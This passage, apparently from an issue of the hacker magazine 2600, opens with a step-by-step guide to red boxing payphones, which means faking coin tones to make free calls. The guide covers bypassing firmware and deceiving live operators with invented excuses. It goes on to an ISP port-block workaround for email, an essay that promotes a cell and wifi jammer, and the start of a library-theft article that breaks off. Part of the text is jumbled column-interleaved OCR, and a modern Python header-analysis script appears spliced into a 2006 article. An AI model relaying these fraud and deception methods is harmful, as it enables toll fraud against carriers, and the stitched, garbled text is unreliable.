Think back to the "good ol' days" when red boxing was a fad in the phreaking scene. Everyone had their modified tone dialer, microcassette recorder, or other form of red box device at the ready, dialing away at the nearest payphone. But think about what they were waiting for on the line; you may be missing the key to what made it all possible. You can't start playing your tones at any given time; you first need to know the rate of the call. Soon after dialing the number, the automated prompt for the amount to deposit came on the line, which is also the system that verifies your coins by listening for the tones that the payphone, or your red box, plays down the line: the Automated Coin Toll System (ACTS). In other cases, a live operator would come on the line instead, but you'd still be asked for the amount to deposit. Even with the operator on the line, ACTS was there as well, so red boxing was still an option as long as the operator didn't suspect toll fraud. Now that we've covered the main thing that makes red boxing possible, let's go over why some people question its plausibility.

The Cause of the Confusion

Until a few years ago, getting ACTS on the line was simple. All you had to do was dial a long distance number and wait to be prompted for the amount to deposit by either an automated ACTS prompt or a live operator. In both cases, it was very simple and anybody could do it as long as they had a red box to play the necessary tones. The reason that this was so easy was because during this time, all long distance calls by coin were handled by AT&T throughout the country, and therefore you would get their ACTS on the line whenever you dialed a long distance number. Unfortunately, things changed with time. According to their news release on June 5, 2002 (http://www.att.com/news/2002/06/05-10539), AT&T began phasing out their ACTS as the months went by, starting with the states that had the most coin long distance calling. During this time, as long as the payphone you were using wasn't phased out yet, a recorded message would come on the line before your call was completed and tell you that the payphone you were using would soon no longer accept coins for AT&T long distance calls, suggesting the use of a prepaid calling card or other payment method as a substitute. Sure enough this eventually happened.

Now without AT&T's ACTS in place, long distance calls by coin have to be handled differently. So if you dial a long distance number on a payphone
that formally gave you the automated ACTS prompt or an AT&T operator requesting coins, you will instead get routed to an intercept (an error message), or be prompted for coins from the payphone itself. Once people started getting this instead of the AT&T prompt they were used to, many jumped to conclusions and claimed red boxing as obsolete. Other people claimed that red boxing is only possible through a live operator. However, like I said before, red boxing is still possible and using a live operator is not always necessary.

How It's Still Possible

So how can you still red box? In order to answer that question, I first need to go over LATAs. In case you're not familiar with that term, LATA stands for Local Access and Transport Area. LATAs are geographic areas that dictate how far an Incumbent Local Exchange Carrier (ILEC), a carrier such as Verizon or SBC, can route calls. If a call stays inside of a LATA, it is an intra-LATA call. Also, if an intra-LATA call goes beyond a local calling area, it is called a regional toll call (also sometimes referred to as "local toll"). Calls that are placed between LATAs are inter-LATA and handled by an Interexchange Carrier (IXC), otherwise known as a long distance carrier. Did you get all of that? Good, then let's continue.

AT&T indeed got rid of their ACTS, making red boxing long distance calls a thing of the past. However, many ILECs still have their own in place, namely Verizon, SBC, and Qwest. Since the ILEC is the carrier running the ACTS you're trying to get on the line, all of your calls usually need to be intra-LATA. There are different ways you can get ACTS on the line and in some cases you are limited to where you can call in the LATA.

Types of Payphones

It's very important to get familiar with the different types of payphones in order to know which ones you're able to red box from. In fact, with the newer technology implemented in more payphones now, you may also need to know how to red box them. There are four types of payphones that I am going to go over: BOCOTs, COCOTs, Hybrids, and Half Breeds.

Bell owned and operated payphones are usually the only ones that use network control signaling to communicate with ACTS. Therefore, these are the ones you normally want to look for if you want to go red boxing. Your area's ILEC is always the provider, and its logo should always be shown somewhere on these payphones, making them easy to point out. The three types of Bell operated payphones that I'll go over are BOCOTs, Hybrids, and Half Breeds. One thing to note is that a BOCOT can refer to any of these three payphones, but herein I'll be using this term specifically for the ones that do not have firmware programmed in them. Now that I've made that clear, let's continue.

BOCOT stands for Bell Owned Coin Operated Telephone. This payphone is very standard and does not have any firmware programmed in it to interfere with what you dial. In a lot of areas, these were the original payphones introduced before newer technology came out. You should be able to tell if you're on one of these phones when you dial; there won't be any internal recordings or modem dialing after you dial a phone number. You should also be able to break the dial tone by tapping the switch hook. For all of these reasons, this is the payphone that should give you the least amount of trouble when using your red box.

COCOT stands for Customer Owned Coin Operated Telephone. This type of payphone rarely uses network control signaling or supports ACTS, at least in the U.S. There are many types of this payphone used by different providers. The logo, if shown, should represent a Competitive Local Exchange Carrier (CLEC), which is simply a carrier that competes with an ILEC. Firmware in the phone determines rates, verifies coin payment, and routes calls using an internal modem. In this common case, red boxing is not an option. In rare circumstances, a COCOT may use network control signaling to communicate with ACTS, and possibly also lack firmware, making red boxing possible.

Hybrids are Bell-operated payphones like BOCOTs. These are usually the same phone and look identical. The difference is that these have firmware in them. When dialing phone numbers, or even the local operator with 0, the firmware usually kicks in and dials the number for you using an internal modem. The problem with this is that what you dial and what the modem dials can be two different things. For example, on Verizon Hybrids, dialing for the local operator will cause the modem to dial Verizon Select Services' Carrier Access Code (CAC) plus a zero, in the format 101-XXXX-0. This brings you to a long distance CLEC operator, instead of the local operator you were supposed to reach. A CLEC operator surely isn't going to do coin verification, so there's no point in whipping out your red box.

As for Half Breeds, they're even worse than Hybrids because they look and operate more like a COCOT, which means more firmware to ruin your day. As you can imagine, these phones are a nuisance in many ways.

On with the Red Boxing!

Time to get into what you've all been waiting for: the red boxing! Here I'll be showing you every method I know to get ACTS on the line.

First of all, in order to be able to red box, you must be in the territory of an ILEC that supports ACTS. The only ILECs I know that do this are Verizon, SBC, and Qwest, although there could be others that I'm unaware of. If you're unsure whether or not your ILEC supports ACTS, you can simply try these methods to know for sure. There are also areas that
use the ACTS from a different ILEC. For example, Connecticut is in SNET (Southern New England Telephone) territory, yet some of the payphones there give you a Verizon ACTS prompt when you dial a regional toll number. If you still find yourself unable to red box, you may need to be in a different area.

As I explained earlier, all calls usually have to be intra-LATA since the ILECs are the only carriers supporting ACTS now. However, as you may already know, most direct dialed local calls are usually verified by a ground test, meaning that you must deposit the money before you finish dialing the number in order for the test to pass. That leaves only one other kind of call: regional toll. These calls always require you to press 1 before the number, since there is indeed a regional "toll" for the call. Direct dialing a regional toll number should bring you to an ACTS prompt most of the time, and it's the easiest way of getting one on the line so you can start using your red box. Unfortunately, the regional toll method leaves out calls in your local calling area, and there are going to be times when you need to place a local call. Have no fear though, there are still a few ways that you can red box locally.

Another way to get an automated ACTS prompt is through directory assistance, so this method will obviously limit you to listed phone numbers. To do this, pick up the phone and dial 411. Here in Massachusetts where I live, directory assistance is free of charge. However in all other areas there will be a small fee. If you live in one of these areas, ACTS will prompt you for an amount to deposit. At this point, you can use your red box to "pay" the necessary amount. If you don't want to use your red box, you may also try tapping the switch hook very quickly, which is a trick that usually only works on regular BOCOTs, but this is not guaranteed. If you're on a Hybrid or Half Breed, the firmware in the phone may keep the line on hook for a longer period of time and instead disconnect the call, though this is not always the case. The reason that this trick sometimes works is because tapping the switch hook signals the operator to come on the line. But in this case the operator would specifically be the directory assistance operator. Pretty clever eh? Once you get directory assistance on the line, look up the number you're trying to call. This can be either a local or regional toll number. The operator will then put on the recording that announces the phone number. During or after this recording, you should be asked if you want to place a call to this number for an additional fee. Choose to do so by coin deposit, then wait for the ACTS prompt to come on the line. Voila! Now you're all set to start red boxing the call.

Wouldn't it be great if you could simply dial a local number direct and still be able to red box the call? Well, guess what? You can! In some cases, dialing a cell phone number will bring you to an ACTS prompt, even if it's a local number. I know for sure that this works in Verizon territory. To try this, pick up the phone and dial 0 plus the area code and seven digit cell phone number in the format 0 NPA-NXX-XXXX. You should get the ACTS prompt on the line afterwards. If you do not, you may want to try dialing in one of these two other formats: NPA-NXX-XXXX or 1-NPA-NXX-XXXX. If those also fail, there are three possible reasons. One reason could simply be that the ILEC doesn't support ACTS with these particular dialing methods. The second reason could center around the cell phone's carrier. In Verizon territory, if the cell phone you are calling isn't with Verizon Wireless, you will not be prompted by ACTS. The same could be true for other ILECs and their wireless carriers. The last reason could be because of the particular type of payphone you are using. Remember what I told you about Hybrids and Half Breeds? Well, if you're on one of those phones, the firmware is most likely interfering with what you're trying to dial. I'll be explaining how to deal with these types of payphones a little later on.

One interesting thing about this method of red boxing is that the call may sometimes be unlimited, meaning that you can stay connected to your party indefinitely. This may only be for local calls though, because when the call is local ACTS usually prompts you for 50 cents, which is often the amount for a direct dialed local call when the money is verified by a ground test.

Very recently during HOPE Number Six, I found out that you can reach ACTS by dialing a long distance number! You heard that right, you can red box long distance calls! In New York City, which is in Verizon territory, you'll get an automated Verizon ACTS prompt for $1.05 after dialing any inter-LATA number in the U.S. International calls are excluded from this, so you'll have to make sure that you always dial domestically. A few friends and I developed a theory that Verizon may be experimenting with their ACTS and slowly implementing it for long distance use. This may have something to do with the recent Verizon/MCI merge, which gives Verizon an IXC to work with, possibly for coin long distance calls supported by ACTS as well. This could be big news if red boxing long distance makes a return. All we can do is wait and see.

That's all for ways of getting an automated ACTS prompt. Now for using live operators. Only your local operator can do coin verification. Getting one on the line is as easy as dialing 0. Once you have the operator on the line, you simply give her the local or regional toll number you want to call and tell her you're paying with coins. The operator will then tell you to deposit the money. You can now go ahead and start playing your red box tones, being careful not to make any other noises that could make the operator suspect toll fraud. If that happens, hang up and retry. Once all of your "coins" have been verified, the operator will complete your call. There may
be ti mes when the operator wi l l gi ve you a hard that the 555 number is i ncorrect and you ' re cal l i ng
ti me, tel l i ng you to di rect di al the cal l yoursel f. I f a di fferent number. Hal f of the t i me you wi l l be tol d
t hi s happens, you may want t o try maki ng up an t o hang up and redi al . However, i f you ar e asked for
excuse for needi ng the operator to pl ace the cal l the number you want to cal l , g o ahead a n d gi ve i t
for you, such as the keypad bei ng broken, or bei ng up. Now you ' l l be asked for the amount to depos i t
handi capped and i ncapabl e of di al i ng yoursel f. Thi s and you can red box away.
a l l sounds pretty easy, ri ght? Wel l , i t can get even Deal i ng with Hybrids and Half Breeds
easi er! Hybri ds and Hal f Breeds can prevent you from
In Qwest terri tory, you can use di rectory assi s- bei ng abl e to do a l ot of t hi ngs. Some of these t hi ngs
tance to get an operator on the l i ne as wel l . Onl y i n i ncl ude cal l i ng the l ocal operator when you di al
t hi s case, there' s l es s l i kel y a chance of t he operator 0, gett i ng an ACTS prompt when di al i ng 0 pl us a
refusi ng to compl ete your cal l . To do t hi s, di al 41 1 cel l phone number, and even fl ash hooki ng prop
and l ook up any l i sted number. After the number erl y. Unfort unatel y, I don' t have the t i me to i ncl ude
pl ays, choose to pay by coi n and wai t for the ACTS al l of the methods of bypassi ng fi rmware on these
prompt to come on. Thi s t i me, l et the recordi ng pl ay phones. What I wi l l go over is a speci fi c ki nd of
and repeat i tsel f unti l you get another operator on fi rmware bypassi ng techni que t hat takes advantage
the l i ne ( qui ckl y fl ash hooki ng may al so be useful of Verti cal Servi ce Codes (VSCs) . VSCs are customer
here) . Once the new operator comes on, he or di al ed codes preceded by a star (*) , or 1 1 i f you
she wi l l ask you for the amount to deposi t. At t hi s have a rotary phone, t hat access servi ces provi ded
poi nt, ask the operator what number you are cal l i ng, by a l ocal or l ong di stance carri er. *69 Cal l Return,
soundi ng very confused. When he or she tel l s you a servi ce that l ets you cal l back the l ast party who
the number, expl ai n to the operator that t hi s i s not cal l ed you, i s one of the better known VSCs. The
the number you were tryi ng to cal l . You shoul d be three that you can use on Hybri ds ( not Hal f Breeds)
asked for the number you're calling now, so go ahead and give it up. When you're asked for the amount to deposit, go ahead and start red boxing. Since the first phone number and rate were already known, and you were already going to place a call with coins, your call should be completed with no questions asked. I am unaware if this trick works outside of Qwest territory, so give it a try elsewhere if you want to find out.

You know how dialing 0 plus the number you want to call gives you other billing options such as collect, third party, person-to-person, calling card, and credit card? Well, sometimes when you talk to someone live, it's a real operator that can do coin verification! To see if this will work for you, simply dial 0 and the number you are calling in the format 0 NPA-NXX-XXXX. If you are brought to an automated system telling you your billing options, choose to talk to a live operator. Next, tell the operator that you want to pay for the call with coins. If the operator asks you for the amount to deposit, you're all set to red box the call. If not, chances are you're out of luck.

I'm not done yet: here's one last method of getting an operator on the line. This one involves using the 555 exchange. I know this works in Verizon territory, but am unsure if it works anywhere else. Pick up the phone and dial an unassigned number in exchange 555, in the format 1-NPA-555-XXXX. In a few moments, an operator may come on the line. If you don't get an operator, or if the operator tried placing the call before you could speak, hang up and redial. If the operator does come on, he or she may sound confused or ask if you're calling a cell phone. You need to talk quickly before the operator tries to place this invalid call! Explain to him or her

are *67, *82, and *58. In case you aren't familiar with these codes, *67 is for blocking your Caller ID, *82 is for unblocking your Caller ID, and *58 is for preventing other stations on a Multibutton Key Set (MBKS) on ISDN from accessing your call. When using these, you have to dial them in the style for rotary phones, meaning that you precede them with 11 instead of * because the firmware in the Hybrids prevents that touch tone from reaching the dial tone. So you'll actually be dialing 1167, 1182, or 1158.

To use these VSCs, pick up the phone and dial one of them. If you dial 1167 or 1182, you'll hear a stutter dial tone. If you dial 1158, the dial tone will drop, some clicking will sound, and then your dial tone will eventually be returned. 1158 in particular is very strange and I have yet to understand why it does this, especially considering it's for ISDN. Once you have dialed one of the VSCs, the firmware in the Hybrid will no longer interfere. From here, you can go ahead and dial what you would have normally been prevented from accessing, such as the local operator by dialing 0. Unfortunately these codes don't work everywhere, so if they all fail, try another location. 1158 in particular seems to work more often in major cities like Boston or New York City for some reason, so try it in those areas as well.

As for Half Breeds, I've never learned much about these, so I don't know of any ways around their firmware. Sorry.

Other Tricks and Advice

There is one really cool thing you can do with Verizon's ACTS that I should share. When you get to the automated ACTS prompt, you can continue to red box in more "money" past the maximum amount necessary for the call! This can be done indefinitely; just keep playing the tones to get more and more
credited to your call. The more "money" you add up, the longer your call will be before you get another ACTS prompt. As far as I know, this is only possible through Verizon. For fun, you could actually red box in $100 worth of tones to hear it say "Thank you, you have one hundred dollars credit towards overtime." Of course, Verizon would be pretty suspicious if they saw such a large amount of money spent on an ACTS call in their records.

As for issues you might be having, there's no need for me to go over the common details of why your red box might not be working. That information is already freely available online. Play your tones louder or softer. Try re-recording them to get rid of distortion. Move your red box closer or further away from the mouthpiece of the payphone. Try soldering on a better crystal in your tone dialer. It should all be common sense to you by now after all these years. However, there is something I want to go over about certain payphones. Some of them have their own ways of preventing red boxing. Let me explain.

There are some payphones that actually filter out the red box frequency from being played through the mouthpiece. You can actually hear the phone click as it blocks these tones every time you play them.
When you're having trouble red boxing a call, and common problems like the ones above aren't the issue, this just may be what's causing the trouble. If you're still not sure, go to another payphone and try red boxing that one. If it works, it was probably the first payphone filtering out that frequency. There is nothing you can do about this other than use another payphone. Sure, you could attempt to take the phone apart or beige box onto the physical line somewhere, but who really wants to bother doing all of that just to make a payphone call? Getting inside the phone usually isn't an option anyway considering how well locked and secured they are. Sometimes you just have to accept when you're beat.

So now you know for certain that red boxing isn't dead yet. I've answered the question "Can I still red box?" and gone beyond by giving you all the known methods of pulling it off. What more could you ask for? Hopefully now I've answered every question you could possibly have. Happy red boxing... and happy trails!
Shouts: av I d, I-baLL, decode/; greyarea,
Lucky225, Natas, WhiteS word, licutis, Not Theory,
Cesssnaa, Lowlec, x64, kurced, Doug from Doug Ti
Athnex, Majestic, BlakeOPS, MurdOc, accident, Tim,
Lamerloe, Elt; Boston 2600.
How to Get Around Cable/DSL Lockdowns
by Pirho

Raise your hand, all of you that have a cable or DSL modem. Now how many of you have email accounts with your cable/DSL provider? Now how many of you have tried to use your email account to send out without being on the cable/DSL network?

OK, put your hands down.

I am going to fill you in on a little secret. The cable and DSL companies all have locked down their outgoing SMTP access so you can't send out mail with any other company's account other than their own. Many a time I am out in the field and I need to hook into a company's LAN and use their Internet access to send out mail only to be frustrated because my ISP has locked out port 25 to everyone who isn't on their network.

Well I got so frustrated I finally decided to take matters into my own hands. But first a word from our legal team. Everything that I am about to explain is for informational purposes only and should not be attempted or duplicated as it may very well be a violation of your TOS with your ISP. In other words, don't try this at home!

OK, here we go.

The company that I work for has a Microsoft Exchange server that I obviously have an account on (I should, I built it). But I never want to use the Exchange servers to do my SMTP relay because I know that my company not only monitors the email traffic for spam and viruses but also captures every scrap of mail that comes in and out of the Exchange server. The last thing I want is someone reading my emails.

We also have a separate piece of hardware known as a Barracuda Spam Firewall which allows us to filter out the spam and any virus that tries to come in through email. I also know that the Barracuda tags the outbound emails with a stupid signature that gives a legal disclaimer with my company's address and information, so I don't want to use that.

So what's a person to do? Simple, build your own SMTP server and use that to relay your messages. Here's how to do it:
Being that I had two computers at my apartment hooked into a cable modem using a store bought firewall/switch, I built one of them as a Win2k3 box. Since it's a true server now, I have the ability of installing IIS 6.0 on it. Since IIS is more than just a web server, it has the ability to install SMTP service on it, thus allowing me to use it as an open relay.

That's when I discovered the problem. How do I lock it down? Why do you need to lock it down? Why not leave it open? Well, for starters, this is what happens when you leave an SMTP server open as a relay:
Received: from cm218-254-88-90.hkcable.com.hk ([218.254.88.90])
    by ****************.DYNDNS.ORG with Microsoft
    SMTPSVC(6.0.3790.1830); Wed, 7 Jun 2006 05:45:16 -0400
Received: from dns0.yahoo.com (dns0.yahoo.com [100.170.4.28]) by 218.254.88.90
    with Microsoft SMTPSVC(5.0.2195.6824); Wed, 07 Jun 2006 10:42:39 +0100
Received: from dns0.yahoo.com (dns0.yahoo.com [187.164.152.236]) by 218.254.88.90
    with Microsoft SMTPSVC(5.0.2195.6824); Wed, 07 Jun 2006 12:40:39 +0300
Received: from dns0.yahoo.com (dns0.yahoo.com [106.74.231.6]) by 218.254.88.90
    with Microsoft SMTPSVC(5.0.2195.6824); Wed, 07 Jun 2006 07:41:39 -0200
Message-ID: <5475963666.949175265917000707031@yahoo.com>
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Date: Tue, 19 Jan 2092 11:14:07 +0800
From: [deleted]@yahoo.com>
Reply-To: [deleted]@yahoo.com>
To: [deleted]@yahoo.com.tw

around fundraiser, stovepipe behind bartender, and defined by ballerina are
what made America great! For example, avocado pit behind waif indicates
that around cleavage befriend bartender beyond rattlesnake. Unlike so many
widows who have made their strawberry-blonde cigar to us. But they need to
remember how inexorably submarine near pickup truck goes to sleep.
You get people from all over the world sending out spam to everyone else like you and me. Not only is this a terrible thing to get in your email but it can send up red flags at your ISP when hundreds of these come in a night.
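For anyone running a relay like this, the trace headers above are what to look for in the server's own queue and logs. The following is an added example, not code from the article: it parses a Received chain and reports the signs visible in that spam sample. The sample messages, the trusted network 192.168.0.0/24, the local domain example.org and the finding names are all assumptions made for the illustration.

```python
import ipaddress
import re
from email import message_from_string
from email.utils import parseaddr, parsedate_to_datetime

# Constructed samples modelled on the trace in the article; every host name
# and address is a placeholder from documentation ranges.
SPAM_SAMPLE = (
    "Received: from cm-host.example.net ([203.0.113.90])\n"
    " by relay.example.org with Microsoft SMTPSVC(6.0.3790.1830);\n"
    " Wed, 7 Jun 2006 05:45:16 -0400\n"
    "Received: from dns0.mail.example (dns0.mail.example [198.51.100.28])\n"
    " by 203.0.113.90 with Microsoft SMTPSVC(5.0.2195.6824);\n"
    " Wed, 07 Jun 2006 10:42:39 +0100\n"
    "Received: from dns0.mail.example (dns0.mail.example [198.51.100.236])\n"
    " by 203.0.113.90 with Microsoft SMTPSVC(5.0.2195.6824);\n"
    " Wed, 07 Jun 2006 12:40:39 +0300\n"
    "Received: from dns0.mail.example (dns0.mail.example [192.0.2.6])\n"
    " by 203.0.113.90 with Microsoft SMTPSVC(5.0.2195.6824);\n"
    " Wed, 07 Jun 2006 07:41:39 -0200\n"
    "Date: Tue, 19 Jan 2092 11:14:07 +0800\n"
    "From: sender@mail.example\n"
    "To: target@elsewhere.example\n"
    "\n"
    "constructed body\n"
)
CLEAN_SAMPLE = (
    "Received: from workstation ([192.168.0.10])\n"
    " by relay.example.org with ESMTP; Wed, 7 Jun 2006 05:45:16 -0400\n"
    "Date: Wed, 7 Jun 2006 05:45:10 -0400\n"
    "From: me@example.org\n"
    "To: friend@example.org\n"
    "\n"
    "constructed body\n"
)

HOP_RE = re.compile(
    r"from\s+(?P<helo>\S+)\s+\((?:\S+\s+)?\[(?P<ip>[^\]]+)\]\)\s+by\s+(?P<by>\S+)",
    re.IGNORECASE,
)


def parse_hop(value):
    """Turn one Received header into {helo, ip, by, when}, or None if unparseable."""
    flat = " ".join(value.split())          # undo header folding
    m = HOP_RE.search(flat)
    if not m or ";" not in flat:
        return None
    try:
        ip = ipaddress.ip_address(m["ip"])
        when = parsedate_to_datetime(flat.rsplit(";", 1)[1].strip())
    except (ValueError, TypeError):
        return None
    return {"helo": m["helo"].lower(), "ip": ip, "by": m["by"].lower(), "when": when}


def analyze(raw, trusted_nets, local_domains, max_skew_days=7):
    """Return a list of finding names for one raw message (newest hop is first)."""
    msg = message_from_string(raw)
    hops = [h for h in map(parse_hop, msg.get_all("Received", [])) if h]
    if not hops:
        return ["NO_PARSEABLE_HOPS"]
    findings = []
    nets = [ipaddress.ip_network(n) for n in trusted_nets]
    newest = hops[0]                        # the hop our own server stamped
    rcpt_domain = parseaddr(msg.get("To", ""))[1].rpartition("@")[2].lower()
    # Outside client handing us mail for an outside recipient: relay use.
    if not any(newest["ip"] in n for n in nets) and rcpt_domain not in local_domains:
        findings.append("RELAYED_FOR_OUTSIDER")
    # One HELO name claimed from several addresses: forged trace lines.
    seen = {}
    for h in hops:
        seen.setdefault(h["helo"], set()).add(h["ip"])
    if any(len(ips) > 1 for ips in seen.values()):
        findings.append("HELO_IP_MISMATCH")
    # Read oldest to newest, timestamps should never go backwards.
    ordered = hops[::-1]
    if any(b["when"] < a["when"] for a, b in zip(ordered, ordered[1:])):
        findings.append("TIME_NOT_MONOTONIC")
    # Date header far away from the moment we actually received the message.
    date_hdr = msg.get("Date")
    if date_hdr:
        sent = parsedate_to_datetime(date_hdr)
        if sent.tzinfo and newest["when"].tzinfo:
            if abs(sent - newest["when"]).days > max_skew_days:
                findings.append("DATE_SKEW")
    return findings


if __name__ == "__main__":
    print(analyze(SPAM_SAMPLE, ["192.168.0.0/24"], {"example.org"}))
    print(analyze(CLEAN_SAMPLE, ["192.168.0.0/24"], {"example.org"}))
```

Header analysis only tells you after the fact; the first finding goes away once the server refuses unauthenticated clients, which is the next step in the article.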
What to do? Simple, now turn on authentication. By simply enabling authentication on the access tab and setting it to use Windows authentication you can now just create an account and safely send out the email without having to worry about the entire Taiwanese country sending spam out through your server.

Ok, that worked. We're all done, right?

Wrong!

We need to do something about port 25 now. Remember, ISPs are blocking all traffic on port 25 that's not part of their network. So if I am over at a friend's house or using a wireless connection that I "borrowed" from someone, I need to have the ability to send out mail on a port other than 25. I need a way of fooling the ISP to allow me to send out the emails.
In IIS you can specify the ports that you want to send out on. By default it's port 25, but that does not mean you're limited to using that.

Under the default SMTP server connection you can go into the properties and you will be presented with a list of options: General, Access, Messages, Delivery, LDAP Routing, and Security. Go into the General tab and within that page is an Advanced button. From there you have the ability to not only add and remove more virtual SMTP servers, but to edit them as well.

From here you want to change it to a port that is not going to be in use by any other application. In this case we can choose 465.

Wait! 465 - that's SSL!

Yes, it is the port that SSL is using. However you can still utilize it without having SSL configured. Just make sure after you're done to open port 465 on your firewall/router and set it to go to the inside IP address of your new server.
Wait! What about the IP address? Isn't it going to change?

Why yes it is, and this is the cool part. You make sure that whatever router you get has the ability to use dynamic DNS. Dynamic DNS is a service that works the same way regular DNS works but works in real time instead of waiting /n/ amount of time for the replication to update (usually 24 hours).

With Dynamic DNS your router will automatically update the external DNS service in real time each time your ISP renews your address. This way you never have to keep track of an IP address.

That's basically it. With some minor tweaking and a decent computer you can easily send out email with no problems and not have to be restricted by those damn cable providers anymore!
What's hacking? I suppose the definition that's always the easiest to explain - or start conversations with - is someone who looks at the things everyone else sees, but in a new and different way that's not immediately apparent. Sometimes this lens focuses on a cause, a project, or the desire to fight for people who can't necessarily help themselves. It's part curiosity and it's part sharing. But most of all it's human nature. It's hard to stop millions of years of evolution. We're meant to take things apart and figure out how they work. Sometimes these activities aren't immediately understood or they're considered criminal by some. But over and over again history has proven endless tinkering yields some of the best results.

I spend my days and nights writing how-tos on building electronics, publishing print and electronic information in an effort to reclaim part of the heritage of the country I'm a citizen of, the United States of America. We are a nation of hackers and tinkerers. Ben Franklin wasn't a president, yet he resides on the top denomination of our currency. That's how important the inventive is. You can see my work in the pages of MAKE Magazine, Popular Science, hardware hacking books, and lots of techie sites around the web. I think the "how-to" is one of the most powerful things anyone can create. It can change minds and influence politics. It all depends on what you're sharing....

On display at the Computer History Museum (computerhistory.org) is a blue box previously owned by Steve Wozniak, cofounder of Apple Computer. Why in the world would a piece of subversive technology made to get free phone calls be celebrated alongside Cray supercomputers? It's not the device that's so special, it's the subculture it created, which still represents what hacking and exploring technology is all about for a lot of past, present, and future hackers.

I'm here to tell you we're approaching a new age of hardware hacking that will have profound consequences on the decades ahead. Look around your home - dozens of cheap devices assembled in other parts of the world, brought to you at the lowest possible price. It's cheaper to buy something assembled than to get individual parts. Over the last ten years as the prices of gadgets and doodads dropped dramatically (you can get a digital camera for under $10 now), the ability to get information out has greatly increased on an individual level. Flawed as they are, wikis, blogs, RSS, YouTube, etc. simply do not care about secrets or nondisclosure agreements. The information on how things are made and how to bend them is getting out there. The "recipes" of how things are made, their individual components, and their secrets aren't as mysterious as they once were. Want to make that "single use" camera multi-use? Or use it as a night vision cam? No problem. A hardware hack and firmware mod later you have a cheap reusable device for just about anything (tinyurl.com/y6k3z8).

Part of this "movement" of sorts is "open source hardware," or open design. To quickly define this: open source software has and will continue to have a huge impact around the world - unpaid, loosely connected legions of developers have more strength and usually outperform any counterpart in the proprietary software arena. People who work on hardware see the same benefits possible and are bringing these practices to the world of the physical. Engineers to garage tinkerers are putting hardware under the same licenses you see with computer applications.

This isn't anything new. Ask your grandparents about their AM radios they lovingly built, maintained, and repaired. It would be unheard of to not have user serviceable parts or documentation. Recently we almost lost our way with extended warranties, tamper-proof devices, and sealed hardware. It became cheaper to toss that old PDA than to repair. But now hit Google and see the hundreds of projects, parts procurements, and possibilities with that old hardware.

Companies and even governments don't exactly like people taking things apart or circumventing "protections" and here is where the subversive part comes in. Subversive usually
means "a systematic attempt to overthrow or undermine a government or political system by persons working secretly from within." Not exactly the perfect definition. After all, there aren't any secrets. It's out in the open. But even the simple act of tinkering with electronics or unlocking your cell phone is certainly working within the system to enact change.

It starts out with simple acts of rebellion; anyone can buy a CD, rip the MP3s, and play their music on any device. Why in the world can't you do that with a DVD? Companies make portable video devices and expect us all to go out and repurchase content we already own to watch it on the small screen. That's not acceptable, so what happens? Dozens of open source applications are shared and posted to rip the DVDs. This isn't piracy. The people who pirate things will always get around any protection. This is just fair use.

If you buy a cell phone and want to switch carriers (GSM), the carrier unfortunately "locks" the hardware and you'll need to purchase a new phone. Of course, the crafty individual will quickly see there are dongles, codes, and articles on hardware unlocking. It's such a common practice, everyone looks the other way.

These examples have gone on and on for years. Finally, in November of 2006, there was change. The Library of Congress approved a few copyright exemptions. Professors can legally crack the DeCSS for archival purposes, anyone can unlock their cell phone, old software can be cracked, and blind persons can unlock protected ebooks for audio readers (copyright.gov/1201/).

Not bad, but we're just getting started. We can't let up - things will change for the better. Getting the information out there - pervasive and complete - eventually makes any effort to silence the critics useless.
We're told there is nothing to worry about with RFID, that it's required for our passports and everything is going to be OK. Turns out there are major issues. It only took a couple of open hardware projects to show how easy it was to clone, even from a distance, an RFID enabled passport. A minor concession was planned - a metallic lining to protect the RFID chip from being read. It's essentially a tin foil hat, go figure. The RFID chip will be encrypted so it can only be read when it's swiped. So what's the point of using RFID? While the battle rages on anyone can build their own reader, cloner, and capturing device (cq.cx/proxmark3.pl). Code and schematics are included.

Cities and large companies (Google) are actively seeking to cover every square inch with wifi. Extremely convenient, sure. But so is broadcasting your ID with RFID chips. Conveniences that give up privacy aren't always worth the trade. Maybe it will all work out and our data will be safe, it will never be abused, and unicorns will graze on the fields as we live blissfully. What's more likely to happen is tracking, data mining, and incredible breaches of personal information and security. But when your cities are filled with the signal, there isn't really a way to stop it even in your home or business, right? Maybe not. In this issue of 2600 is the circuit diagram and information to build the world's first open source cell phone and wifi jammer (ladyada.net/make/wavebubble/). The project was created by Ladyada and supported by Eyebeam in collaboration with the cDc.

The project details the design and construction of a self-tuning, wide-bandwidth, portable RF jammer (870-894MHz, 925-960MHz, 1805-1880MHz, 1930-1990MHz and 2400-2483MHz - 802.11b/g).

While movie theaters and churches lobby to get cell phone jammers legalized for their own uses (but not for "regular folks"), it's now possible to at least have a chance of having the same capabilities our future nannies will have over us.
There's a whole slew of sayings that start off with "It's better to have it and not need it than need it and not have it." They usually refer to nuclear weapons, voltage, parachutes, and condoms. But in this case it's something that might be just as important.

At the time of this writing a Freedom of Information Act request revealed the approval of the "Active Denial System" or ADS. This weapon is certified for use in Iraq and uses 94 GHz (3 mm wavelength) waves to "inflict pain" on humans (tinyurl.com/y8ap66). The effects are said to feel like being dipped in molten lava. This is incredibly scary stuff. Wouldn't it be good to know it will never be used against innocent populations? There's only one guarantee. Someone will need to release the information on how to stop it. It's not ripping DVDs, or using a mod chip in an Xbox, or even jamming cell phones to keep calls out of your home. But tasers and rubber bullets have been abused. What's to stop this?

Who knows? Maybe the cell phone/wifi jammer will end up in the computer museum 20 years or so from now as a footnote in the history of subversive technology that led to many many other innovations.
Library Self-Checkout Machine Exploit
by Byron Bussey

I love the library and what it stands for (I am more a poet/writer than a hacker, but at the core I don't think there is much difference between the two ideologically, perhaps just in their method). So I would be the first to speak against stealing books from the library. But nevertheless there has come to me via that thing called curiosity a very simple way to do just that which involves nothing more than a simple manipulation of the self-checkout machine. I write this then as a warning to library staff and the engineers who design such machines. As they now stand, these devices could be used by nefarious persons to steal books and walk right out the door with them scot-free.
